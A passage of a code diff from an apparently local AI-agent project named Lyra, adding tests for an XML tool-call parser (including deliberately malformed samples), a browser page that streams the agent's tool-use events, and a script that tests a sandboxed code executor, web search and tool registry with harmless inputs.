    <code>print(50 / 2)</code>
    <reason>To calculate the result of dividing 50 by 2.</reason>
  </arguments>
 </olith>"""
        },
        {
            "name": "Malformed closing tag 2",
            "xml": """<tool_call>
  <name>execute_code</name>
  <arguments>
    <language>python</language>
    <code>print(60 / 4)</code>
  </arguments>
  <reason>To calculate 60 divided by 4 using Python.</reason>
 </LTRB"""
        },
        {
            "name": "Partial XML (missing opening)",
            "xml": """<arguments>
    <language>python</language>
    <code>result = 35 / 7; result</code>
  </arguments>
  <reason>To calculate the division of 35 by 7 using Python.</reason>
 </tool_call>"""
        },
        {
            "name": "Correct XML",
            "xml": """<tool_call>
  <name>execute_code</name>
  <arguments>
    <language>python</language>
    <code>print(100 / 4)</code>
    <reason>Calculate division</reason>
  </arguments>
 </tool_call>"""
        },
        {
            "name": "XML with surrounding text",
            "xml": """Let me help you with that.
 <tool_call>
  <name>execute_code</name>
  <arguments>
    <language>python</language>
    <code>print(20 / 4)</code>
    <reason>Calculate the result</reason>
  </arguments>
 </tool_call>
 The result will be shown above."""
        }
    ]
    print("=" * 80)
    print("Testing OllamaAdapter XML Parsing")
    print("=" * 80)
    for test in test_cases:
        print(f"\nTest: {test['name']}")
        print("-" * 80)
        print(f"Input XML:\n{test['xml'][:200]}{'...' if len(test['xml']) > 200 else ''}")
        print("-" * 80)
        try:
            result = await adapter.parse_response(test['xml'])
            print(f"✅ Parsed successfully!")
            print(f"   Content: {result.get('content', '')[:100]}")
            print(f"   Tool calls found: {len(result.get('tool_calls') or [])}")
            if result.get('tool_calls'):
                for idx, tc in enumerate(result['tool_calls']):
                    print(f"   Tool {idx + 1}: {tc.get('name')} with args: {tc.get('arguments')}")
        except Exception as e:
            print(f"❌ Error: {e}")
        print()
 if __name__ == "__main__":
    asyncio.run(test_parser())
--- a/test_thinking_stream.html
+++ b/test_thinking_stream.html
@@ -0,0 +1,286 @@
 <!DOCTYPE html>
 <html lang="en">
 <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Lyra - Show Your Work</title>
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }
        body {
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            background: #1a1a1a;
            color: #e0e0e0;
            height: 100vh;
            display: flex;
            flex-direction: column;
        }
        .container {
            display: flex;
            height: 100%;
            overflow: hidden;
        }
        .panel {
            flex: 1;
            display: flex;
            flex-direction: column;
            padding: 20px;
            overflow: hidden;
        }
        .panel-header {
            font-size: 18px;
            font-weight: bold;
            margin-bottom: 15px;
            padding-bottom: 10px;
            border-bottom: 2px solid #333;
        }
        .chat-panel {
            border-right: 1px solid #333;
        }
        .thinking-panel {
            background: #0d0d0d;
        }
        .messages, .thinking-output {
            flex: 1;
            overflow-y: auto;
            padding: 10px;
            background: #222;
            border-radius: 8px;
            margin-bottom: 15px;
        }
        .message {
            margin-bottom: 15px;
            padding: 10px;
            border-radius: 6px;
            line-height: 1.5;
        }
        .user-message {
            background: #1e3a5f;
            align-self: flex-end;
        }
        .assistant-message {
            background: #2d2d2d;
        }
        .thinking-event {
            margin-bottom: 10px;
            padding: 8px 12px;
            border-radius: 4px;
            font-size: 14px;
            font-family: 'Courier New', monospace;
            animation: fadeIn 0.3s;
        }
        @keyframes fadeIn {
            from { opacity: 0; transform: translateY(-5px); }
            to { opacity: 1; transform: translateY(0); }
        }
        .event-thinking { background: #1a3a1a; color: #90ee90; }
        .event-tool_call { background: #3a2a1a; color: #ffa500; }
        .event-tool_result { background: #1a2a3a; color: #87ceeb; }
        .event-done { background: #2a1a3a; color: #da70d6; }
        .event-error { background: #3a1a1a; color: #ff6b6b; }
        .input-area {
            display: flex;
            gap: 10px;
        }
        input {
            flex: 1;
            padding: 12px;
            background: #2d2d2d;
            border: 1px solid #444;
            border-radius: 6px;
            color: #e0e0e0;
            font-size: 14px;
        }
        button {
            padding: 12px 24px;
            background: #4a7c59;
            border: none;
            border-radius: 6px;
            color: white;
            cursor: pointer;
            font-weight: bold;
            transition: background 0.2s;
        }
        button:hover {
            background: #5a9c69;
        }
        button:disabled {
            background: #333;
            cursor: not-allowed;
        }
        .status {
            padding: 8px;
            text-align: center;
            font-size: 12px;
            color: #888;
        }
        .status.connected { color: #90ee90; }
        .status.disconnected { color: #ff6b6b; }
        /* Mobile responsive */
        @media (max-width: 768px) {
            .container {
                flex-direction: column;
            }
            .chat-panel {
                border-right: none;
                border-bottom: 1px solid #333;
            }
        }
    </style>
 </head>
 <body>
    <div class="container">
        <!-- Chat Panel -->
        <div class="panel chat-panel">
            <div class="panel-header">💬 Chat</div>
            <div class="messages" id="messages"></div>
            <div class="input-area">
                <input
                    type="text"
                    id="userInput"
                    placeholder="Ask something that requires tools... (e.g., 'Calculate 50/2 using Python')"
                    onkeypress="if(event.key==='Enter') sendMessage()"
                >
                <button onclick="sendMessage()" id="sendBtn">Send</button>
            </div>
        </div>
        <!-- Thinking Panel -->
        <div class="panel thinking-panel">
            <div class="panel-header">🧠 Show Your Work</div>
            <div class="thinking-output" id="thinking"></div>
            <div class="status" id="status">Not connected</div>
        </div>
    </div>
    <script>
        const SESSION_ID = 'thinking-demo-' + Date.now();
        let eventSource = null;
        // Connect to thinking stream
        function connectThinkingStream() {
            if (eventSource) {
                eventSource.close();
            }
            const url = `http://localhost:7081/stream/thinking/${SESSION_ID}`;
            eventSource = new EventSource(url);
            eventSource.onopen = () => {
                document.getElementById('status').textContent = '🟢 Connected to thinking stream';
                document.getElementById('status').className = 'status connected';
            };
            eventSource.onmessage = (event) => {
                try {
                    const data = JSON.parse(event.data);
                    addThinkingEvent(data);
                } catch (e) {
                    console.error('Failed to parse event:', e);
                }
            };
            eventSource.onerror = () => {
                document.getElementById('status').textContent = '🔴 Disconnected from thinking stream';
                document.getElementById('status').className = 'status disconnected';
                setTimeout(connectThinkingStream, 2000); // Reconnect after 2s
            };
        }
        function addThinkingEvent(event) {
            const thinking = document.getElementById('thinking');
            const eventDiv = document.createElement('div');
            eventDiv.className = `thinking-event event-${event.type}`;
            if (event.type === 'connected') {
                eventDiv.textContent = `✓ Connected (Session: ${event.session_id})`;
            } else if (event.data && event.data.message) {
                eventDiv.textContent = event.data.message;
            } else {
                eventDiv.textContent = JSON.stringify(event.data);
            }
            thinking.appendChild(eventDiv);
            thinking.scrollTop = thinking.scrollHeight;
        }
        async function sendMessage() {
            const input = document.getElementById('userInput');
            const message = input.value.trim();
            if (!message) return;
            // Add user message to chat
            addMessage('user', message);
            input.value = '';
            // Disable send button
            const sendBtn = document.getElementById('sendBtn');
            sendBtn.disabled = true;
            sendBtn.textContent = 'Thinking...';
            // Clear thinking panel
            document.getElementById('thinking').innerHTML = '';
            try {
                const response = await fetch('http://localhost:7081/simple', {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json',
                    },
                    body: JSON.stringify({
                        session_id: SESSION_ID,
                        user_prompt: message,
                        backend: 'SECONDARY'
                    })
                });
                const data = await response.json();
                addMessage('assistant', data.draft);
            } catch (error) {
                addMessage('assistant', `Error: ${error.message}`);
            } finally {
                sendBtn.disabled = false;
                sendBtn.textContent = 'Send';
            }
        }
        function addMessage(role, content) {
            const messages = document.getElementById('messages');
            const messageDiv = document.createElement('div');
            messageDiv.className = `message ${role}-message`;
            messageDiv.textContent = content;
            messages.appendChild(messageDiv);
            messages.scrollTop = messages.scrollHeight;
        }
        // Connect on page load
        connectThinkingStream();
    </script>
 </body>
 </html>
--- a/test_tools.py
+++ b/test_tools.py
@@ -0,0 +1,91 @@
 #!/usr/bin/env python3
 """
 Quick test script for tool calling system.
 Tests the components before full endpoint integration.
 """
 import asyncio
 import sys
 import os
 # Add cortex to path
 sys.path.insert(0, '/home/serversdown/project-lyra/cortex')
 # Set required env vars
 os.environ['ENABLE_CODE_EXECUTION'] = 'true'
 os.environ['ENABLE_WEB_SEARCH'] = 'true'
 os.environ['CODE_SANDBOX_CONTAINER'] = 'lyra-code-sandbox'
 from autonomy.tools.registry import get_registry
 from autonomy.tools.executors.code_executor import execute_code
 from autonomy.tools.executors.web_search import search_web
 async def test_code_executor():
    """Test code execution in sandbox."""
    print("\n=== Testing Code Executor ===")
    result = await execute_code({
        "language": "python",
        "code": "print('Hello from sandbox!')\nprint(2 + 2)",
        "reason": "Testing sandbox execution"
    })
    print(f"Result: {result}")
    return result.get("stdout") == "Hello from sandbox!\n4\n"
 async def test_web_search():
    """Test web search."""
    print("\n=== Testing Web Search ===")
    result = await search_web({
        "query": "Python programming",
        "max_results": 3
    })
    print(f"Found {result.get('count', 0)} results")
    if result.get('results'):
        print(f"First result: {result['results'][0]['title']}")
    return result.get("count", 0) > 0
 async def test_registry():
    """Test tool registry."""
    print("\n=== Testing Tool Registry ===")
    registry = get_registry()
    tools = registry.get_tool_definitions()
    print(f"Registered tools: {registry.get_tool_names()}")
    print(f"Total tools: {len(tools) if tools else 0}")
    return len(tools or []) > 0
 async def main():
    print("🧪 Tool System Component Tests\n")
    tests = [
        ("Tool Registry", test_registry),
        ("Code Executor", test_code_executor),
        ("Web Search", test_web_search),
    ]
    results = {}
    for name, test_func in tests:
        try:
            passed = await test_func()
            results[name] = "✅ PASS" if passed else "❌ FAIL"
        except Exception as e:
            results[name] = f"❌ ERROR: {str(e)}"
    print("\n" + "="*50)
    print("Test Results:")
    for name, result in results.items():
        print(f"  {name}: {result}")
    print("="*50)
 if __name__ == "__main__":
    asyncio.run(main())